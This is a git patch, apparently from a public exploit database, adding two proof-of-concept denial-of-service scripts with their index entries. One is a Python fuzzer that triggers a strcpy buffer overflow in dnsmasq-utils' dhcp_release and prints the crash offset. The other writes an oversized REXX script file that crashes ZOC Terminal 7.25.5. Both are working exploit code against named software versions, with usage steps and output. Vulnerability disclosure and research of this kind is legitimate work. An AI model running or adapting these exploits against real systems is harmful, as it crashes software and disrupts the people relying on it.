From 36c65f8dd4df875987b37b467d7a03df7dd163ba Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 8 Apr 2020 05:01:50 +0000 Subject: [PATCH] DB: 2020-04-08 2 changes to exploits/shellcodes dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) --- exploits/linux/dos/48301.py | 38 +++++++++++++++++++++++++++++++++++ exploits/windows/dos/48302.py | 21 +++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 61 insertions(+) create mode 100755 exploits/linux/dos/48301.py create mode 100755 exploits/windows/dos/48302.py diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py new file mode 100755 index 000000000..aa6146124 --- /dev/null +++ b/exploits/linux/dos/48301.py @@ -0,0 +1,38 @@ +# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) +# Date: 2020-04-06 +# Exploit Author: Josue Encinar +# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 +# Version: 2.79 +# Tested on: Ubuntu 18.04 + + +from subprocess import Popen, PIPE + +data = "" +bof = False +for i in range (1, 200): + A = "A"*i + data = f"dhcp_release {A} 1 1" + try: + result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) + error = result.stderr.read().decode() + if "Aborted (core dumped)" in error: + print("[+] Buffer Overflow detected!") + print(f"[*] Offset: {i}") + bof = True + break + except Exception as e: + print(f"[-] {e}") + +if not bof: + print("[-] No buffer overflow...") + + +## Check line 273 in dhcp_release.c +### strcpy(ifr.ifr_name, argv[1]); +# +## PoC: +# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py +# *** buffer overflow detected ***: dhcp_release terminated +# [+] Buffer Overflow detected! +# [*] Offset: 16 \ No newline at end of file diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py new file mode 100755 index 000000000..1f658e2bd --- /dev/null +++ b/exploits/windows/dos/48302.py @@ -0,0 +1,21 @@ +# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.emtec.com +# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe +# Tested Version: 7.25.5 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx" +# 2.- Open ZOC Terminal +# 3.- Select Script > Start REXX Script... +# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open" +# 5.- Crashed + +cod = "\x41" * 20000 + +f = open('ZOC_7.25.5_Script.zrx', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ebfba676e..0e71d3f74 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port 48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux, +48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,